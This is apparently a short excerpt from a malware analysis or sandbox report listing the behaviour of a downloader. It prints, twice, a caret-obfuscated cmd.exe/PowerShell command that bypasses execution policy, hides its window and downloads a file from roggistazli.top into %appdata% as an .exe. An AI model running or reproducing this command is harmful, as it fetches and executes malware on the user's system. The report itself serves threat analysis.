Technical information
- http://roggistazli.top/search.php as %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "po^Wer^s^HEL^l^.e^xE^ ^-^ExecutION^POli^cY by^pa^s^s -NoprofIL^e -w^INDOW^S^TYLe^ h^I^d^dE^N (Ne^W^-^Ob^jECT S^YsTeM.n^E^t.wEbcl^IEnT).^DOwNLOadfile('http://roggistazli.top/search.ph...
- DNS ASK ro###stazli.top
- '<SYSTEM32>\cmd.exe' /C "po^Wer^s^HEL^l^.e^xE^ ^-^ExecutION^POli^cY by^pa^s^s -NoprofIL^e -w^INDOW^S^TYLe^ h^I^d^dE^N (Ne^W^-^Ob^jECT S^YsTeM.n^E^t.wEbcl^IEnT).^DOwNLOadfile('http://roggistazli.top/search.ph...' (with hidden window)